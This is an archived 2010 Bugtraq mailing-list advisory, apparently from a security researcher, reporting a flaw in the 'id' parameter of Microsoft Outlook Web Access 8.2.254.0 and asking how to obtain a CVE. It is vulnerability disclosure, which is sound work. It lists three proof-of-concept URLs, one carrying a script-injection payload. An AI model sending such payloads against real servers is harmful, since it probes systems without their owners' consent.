[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability
From: praveen_recker@xxxxxxxx
Date: Thu, 20 May 2010 15:34:14 -0600

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
"Microsoft Outlook Web Access (OWA) version 8.2.254.0"
OS: Windows Server 2003
Internet Explorer 7
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
There is an information disclosure vulnerability in "Microsoft Outlook Web 
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:
https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script>
https://example.com/owa/?ae=Folder&t=IPF.Note&id=
https://example.com/owa/?ae=Folder&t=IPF.Note&id=A


Whom to contact to get a CVE Identifier for this vulnerability.

Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA

Follow-Ups:
- Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability
  - From: Jabłoński, Paweł

Prev by Date: Month of PHP Security - Summary - 11st May - 21th
Next by Date: OSSTMM 3 based Home Security Vacation Guide v.2!
Previous by thread: Month of PHP Security - Summary - 11st May - 21th
Next by thread: Re: Microsoft Outlook Web Access (OWA) v8.2.254.0 "id" parameter Information Disclosure Vulnerability
Index(es):
- Date
- Thread